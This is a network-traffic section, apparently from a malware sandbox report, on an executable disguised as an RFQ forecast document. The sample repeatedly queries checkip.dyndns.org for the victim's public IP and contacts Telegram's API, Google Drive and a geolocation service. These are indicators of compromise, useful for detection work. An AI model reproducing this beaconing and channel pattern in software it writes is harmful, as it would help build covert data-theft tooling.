                                                                                                          Dec 18, 2024 09:52:03.818588018 CET1.1.1.1192.168.2.40x41c9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449738158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:51:52.841017008 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:51:54.497431993 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:51:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a2cb578d7e73839f4f2beaa45cb5c0c7
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Dec 18, 2024 09:51:54.503520966 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Dec 18, 2024 09:51:54.875744104 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:51:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a5f7e154556461b954cdb7c65a2c9117
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Dec 18, 2024 09:52:02.758761883 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Dec 18, 2024 09:52:03.677910089 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:03 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: d524cff2c6c3a5e7d3d9048800a0cf1e
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449757158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:06.128499031 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Dec 18, 2024 09:52:07.328689098 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:07 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 17d9d00751160d76e74fa133d5186255
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449763158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:09.478343964 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:10.678323984 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 01c8e728ecec412f7c571c877e17d00f
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449775158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:12.899662971 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:14.101454973 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:13 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 6e142709083c8cf96c2dbe69cc06e6b1
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449783158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:16.437601089 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:18.055922031 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:17 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 8fc0b1e7e1c517abfc19bd07a64c2b58
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449794158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:20.124254942 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:21.787307978 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:21 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 84cec80c106beb52eb85c7e27519ad80
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449806158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:23.969630957 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:25.762916088 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:25 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 831c07e20761746950c03338fd69e8fd
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449818158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:27.915771961 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:29.121165037 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 9529d788f6b44d69c4b63d21c9ac6076
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449825158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:31.319883108 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:32.536601067 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:32 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 947b427f6fe9448a2b154f08e8f7fc23
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.449837158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:34.765850067 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:35.967087030 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:35 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a7d6f8e57ca44502850511c42c06cdc0
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.449849158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:38.261204004 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:39.591249943 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:39 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 906a1804b51af834f9f1afe553030023
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.449856158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:41.729394913 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:42.930677891 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:42 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: d726fa30afa00e6dd04d6e54aa8fd654
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.449868158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:45.106144905 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:46.306411982 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:46 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: b17ae22b234efb59d9662306e60046c3
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.449875158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:48.482367039 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:49.681303978 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 7c0becdf5598e37f86612b7a0bab69b8
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.449887158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:51.844710112 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:53.042521954 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: c90c9b88a47e56382473a3b542d4d154
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.449895158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:55.388598919 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:52:57.016340971 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:52:56 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 0b2a3cd40cd62b8b9f986824694c0675
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.449906158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:52:59.192332029 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:53:00.438339949 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:53:00 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: f0606c534178e2404a1d0cd33fc09ae9
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.449918158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:53:02.654170990 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
